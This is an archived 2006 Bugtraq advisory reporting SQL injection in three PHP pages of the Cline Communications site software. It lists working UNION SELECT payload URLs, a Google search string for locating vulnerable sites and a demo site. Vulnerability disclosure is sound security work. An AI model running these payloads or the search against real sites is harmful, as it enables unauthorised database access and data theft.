Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Cline Communications Sql injection

From: liz0 () bsdmail com
Date: 17 Jun 2006 13:16:04 -0000
Cline Communications Sql injection
-------------------------------------
Site:http://www.celerondude.com/
Demo:http://www.liveelite.com/
---------------------------------
Sql injection
1,photo_enlarged.php file Photo_ID parameter  
2,newsdetail.php file NID parameter 
3,staff_photo_enlarged.php file Staff_ID parameter




http://website/photo_enlarged.php?Photo_ID='sql

http://website/newsdetail.php?NID='sql

http://website/staff_photo_enlarged.php?Staff_ID='sql


Example:

http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News



-----------------------------------------
Credit:Liz0ziM
E-mail:liz0 () bsdmail com
Site:www.biyo.tk www.biyosecurity.be

Greeatz:My All Friend 

-----------------------------------------
Google:

"This site powered by Cline Communications"
-----------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/714903/
http://liz0zim.no-ip.org/cline.txt
http://biyosecurity.be/bugs/cline.txt
Previous By Date Next
Previous By Thread Next

Current thread: